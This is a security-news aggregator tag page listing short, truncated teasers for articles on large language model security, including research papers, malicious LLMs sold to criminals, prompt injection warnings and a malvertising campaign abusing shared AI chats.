Tag: LLM
-
Securing the AI Revolution: NSFOCUS LLM Security Protection Solution
As Artificial Intelligence technology rapidly advances, Large Language Models (LLMs) are being widely adopted across countless domains. However, with this growth comes a critical challenge: LLM security issues are becoming increasingly prominent, posing a major constraint on further development. Governments and regulatory bodies are responding with policies and regulations to ensure the safety and compliance…The…
-
NDSS 2025 IsolateGPT: An Execution Isolation Architecture For LLM-Based Agentic Systems
Session 6A: LLM Privacy and Usable Privacy Authors, Creators & Presenters: Yuhao Wu (Washington University in St. Louis), Franziska Roesner (University of Washington), Tadayoshi Kohno (University of Washington), Ning Zhang (Washington University in St. Louis), Umar Iqbal (Washington University in St. Louis) PAPER IsolateGPT: An Execution Isolation Architecture for LLM-Based Agentic Systems Large language models…
-
LLM-Driven Automation: A New Catalyst for Ransomware and RaaS Ecosystems
SentinelLABS has released a comprehensive assessment regarding the integration of Large Language Models (LLMs) into the ransomware ecosystem, concluding that while AI is not yet driving a fundamental transformation in tactics, it is significantly accelerating the operational lifecycle. The research indicates that measurable gains in speed, volume, and multilingual reach are reshaping the threat landscape,…
-
Demystifying risk in AI
Tags: access, ai, best-practice, bsi, business, ciso, cloud, compliance, control, corporate, csf, cyber, cybersecurity, data, framework, google, governance, group, infrastructure, intelligence, ISO-27001, LLM, mitre, ml, monitoring, nist, PCI, risk, risk-management, strategy, technology, threat, training, vulnerabilityThe data that is inserted in a request.This data is evaluated by a training model that involves an entire architecture.The result of the information that will be delivered From an information security point of view. That is the point that we, information security professionals, must judge in the scope of evaluation from the perspective of…
-
NDSS 2025 Evaluating Users’ Comprehension and Perceptions of the iOS App Privacy Report
Session 6A: LLM Privacy and Usable Privacy Authors, Creators & Presenters: Xiaoyuan Wu (Carnegie Mellon University), Lydia Hu (Carnegie Mellon University), Eric Zeng (Carnegie Mellon University), Hana Habib (Carnegie Mellon University), Lujo Bauer (Carnegie Mellon University) PAPER Transparency or Information Overload? Evaluating Users’ Comprehension and Perceptions of the iOS App Privacy Report Apple’s App Privacy…
-
Security for AI: How Shadow AI, Platform Risks, and Data Leakage Leave Your Organization Exposed
Tags: access, ai, attack, awareness, business, chatgpt, china, cloud, compliance, control, corporate, cybersecurity, data, data-breach, defense, detection, endpoint, governance, guide, infrastructure, injection, leak, LLM, malicious, microsoft, mitigation, monitoring, network, open-source, openai, privacy, RedTeam, risk, saas, service, strategy, threat, tool, training, vulnerabilityYour employees are using AI whether you’ve sanctioned it or not. And even if you’ve carefully vetted and approved an enterprise-grade AI platform, you’re still at risk of attacks and data leakage. Key takeaways: Security teams face three key risks as AI usage becomes widespread at work: Shadow AI, the challenge of safely sanctioning tools,…
-
NDSS 2025 Evaluating Users’ Comprehension and Perceptions of the iOS App Privacy Report
Session 6A: LLM Privacy and Usable Privacy Authors, Creators & Presenters: Xiaoyuan Wu (Carnegie Mellon University), Lydia Hu (Carnegie Mellon University), Eric Zeng (Carnegie Mellon University), Hana Habib (Carnegie Mellon University), Lujo Bauer (Carnegie Mellon University) PAPER Transparency or Information Overload? Evaluating Users’ Comprehension and Perceptions of the iOS App Privacy Report Apple’s App Privacy…
-
Security for AI: How Shadow AI, Platform Risks, and Data Leakage Leave Your Organization Exposed
Tags: access, ai, attack, awareness, business, chatgpt, china, cloud, compliance, control, corporate, cybersecurity, data, data-breach, defense, detection, endpoint, governance, guide, infrastructure, injection, leak, LLM, malicious, microsoft, mitigation, monitoring, network, open-source, openai, privacy, RedTeam, risk, saas, service, strategy, threat, tool, training, vulnerabilityYour employees are using AI whether you’ve sanctioned it or not. And even if you’ve carefully vetted and approved an enterprise-grade AI platform, you’re still at risk of attacks and data leakage. Key takeaways: Security teams face three key risks as AI usage becomes widespread at work: Shadow AI, the challenge of safely sanctioning tools,…
-
Hackers Are Using Shared AI Chats to Steal Your Passwords and Crypto
A sophisticated malvertising campaign is exploiting ChatGPT and DeepSeek’s shared chat features to deliver credential-stealing malware to macOS users. Threat actors are purchasing sponsored Google search results and redirecting victims to legitimate-looking LLM-generated chat sessions that contain obfuscated malicious commands, effectively bypassing platform-level safety mechanisms. The attack begins when users search for common macOS troubleshooting…
-
Hackers Are Using Shared AI Chats to Steal Your Passwords and Crypto
A sophisticated malvertising campaign is exploiting ChatGPT and DeepSeek’s shared chat features to deliver credential-stealing malware to macOS users. Threat actors are purchasing sponsored Google search results and redirecting victims to legitimate-looking LLM-generated chat sessions that contain obfuscated malicious commands, effectively bypassing platform-level safety mechanisms. The attack begins when users search for common macOS troubleshooting…
-
LLM vulnerability patching skills remain limited
Security teams are wondering whether LLMs can help speed up patching. A new study tests that idea and shows where the tools hold up and where they fall short. The researchers … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2025/12/11/llms-software-vulnerability-patching-study/
-
APT28’s Toolkit: AI, Wi-Fi Intrusions, Cloud C2
APT28’s new “LameHug” malware uses LLMs to generate basic commands, a strikingly clumsy move from an otherwise advanced threat group. First seen on esecurityplanet.com Jump to article: www.esecurityplanet.com/threats/apt28s-toolkit-ai-wi-fi-intrusions-cloud-c2/
-
LLMs are everywhere in your stack and every layer brings new risk
LLMs are moving deeper into enterprise products and workflows, and that shift is creating new pressure on security leaders. A new guide from DryRun Security outlines how these … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2025/12/10/enterprise-llm-security-risks-analysis/
-
Gemini for Chrome gets a second AI agent to watch over it
Google’s two-model defense: To address these risks, Google’s solution splits the work between two AI models. The main Gemini model reads web content and decides what actions to take. The user alignment critic sees only metadata about proposed actions, not the web content that might contain malicious instructions.”This component is architected to see only metadata…
-
Malicious Models im Untergrund – Unit-42 zeigt wachsenden Schwarzmarkt für Dark-LLMs
First seen on security-insider.de Jump to article: www.security-insider.de/unit-42-zeigt-wachsenden-schwarzmarkt-fuer-dark-llms-a-d2a5e7bd2dadf1936b14944af8c3670b/
-
Hacking as a Prompt: Malicious LLMs Find Users
WormGPT 4 Sells for $50 Monthly, While KawaiiGPT Goes Open Source. The cybercrime-as-a-service model has a new product line, with malicious large language models built without ethical guardrails selling on Telegram for $50 monthly or distributed free on GitHub. Others groups are taking the open-source route. First seen on govinfosecurity.com Jump to article: www.govinfosecurity.com/hacking-as-prompt-malicious-llms-find-users-a-30224
-
UK cyber agency warns LLMs will always be vulnerable to prompt injection
The comments echo many in the research community who have said the flaw is an inherent trait of generative AI technology. First seen on cyberscoop.com Jump to article: cyberscoop.com/uk-warns-ai-prompt-injection-unfixable-security-flaw/
-
How Agentic BAS AI Turns Threat Headlines Into Defense Strategies
Picus Security explains why relying on LLM-generated attack scripts is risky and how an agentic approach maps real threat intel to safe, validated TTPs. Their breakdown shows how teams can turn headline threats into reliable defense checks without unsafe automation. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/how-agentic-bas-ai-turns-threat-headlines-into-defense-strategies/
-
KI schafft neue Sicherheitsrisiken für OT-Netzwerke
Sicherheitsbehörden sehen in der vermehrten Nutzung von KI eine Gefahr für die Sicherheit von OT-Systemen.Die Sicherheit der Betriebstechnik (Operational Technology OT) in kritischen Infrastrukturen ist seit Jahren ein immer wiederkehrendes Thema. Nach Ansicht von Sicherheitsorganisationen könnte die vermehrte Nutzung von KI in der OT die Lage noch verschlimmern.Die US-Cybersicherheitsbehörde CISA hat deshalb vor kurzem gemeinsam…
-
LLM-Sicherheit – Cisco-Studie: Multi-Turn-Angriffe knacken Open-Weight-LLMs
First seen on security-insider.de Jump to article: www.security-insider.de/cisco-studie-multi-turn-angriffe-knacken-open-weight-llms-a-a206993ac451107393a3e25f98163544/
-
MIT-Studie: ChatGPT- bzw. LLM-Nutzung und Gehirn-Aktivitäten
Es ist eine Studie des Massachussets Institutes of Technology (MIT) zur Frage “wie beeinflusst die LLM-Nutzung unsere Gehirn-Aktivitäten, die im Sommer erschienen ist und Debatten auslöste. Das Ergebnis in einem Satz: “ChatGPT & Co. machen das Gehirn fauler und lassen … First seen on borncity.com Jump to article: www.borncity.com/blog/2025/12/07/mit-studie-chatgpt-bzw-llm-nutzung-und-gehirn-aktivitaeten/
-
AI creates new security risks for OT networks, warns NSA
Tags: ai, cisa, compliance, control, cyber, data, data-breach, government, healthcare, infrastructure, injection, intelligence, LLM, network, risk, technology, trainingPrinciples for the Secure Integration of Artificial Intelligence in Operational Technology, authored by the NSA in conjunction with the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) and a global alliance of national security agencies.While the use of AI in critical infrastructure OT is in its early days, the guidance reads like an attempt…
-
AI creates new security risks for OT networks, warns NSA
Tags: ai, cisa, compliance, control, cyber, data, data-breach, government, healthcare, infrastructure, injection, intelligence, LLM, network, risk, technology, trainingPrinciples for the Secure Integration of Artificial Intelligence in Operational Technology, authored by the NSA in conjunction with the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) and a global alliance of national security agencies.While the use of AI in critical infrastructure OT is in its early days, the guidance reads like an attempt…
-
OAuth Isn’t Enough For Agents
OAuth is a broadly accepted standard. It’s used all over the internet. But as the usage of LLM agents continues to expand, OAuth isn’t going to be enough. In fact, relying on OAuth will be dangerous. We won’t be able to set permissions at an appropriate granularity, giving LLMs access to far too much. More..…

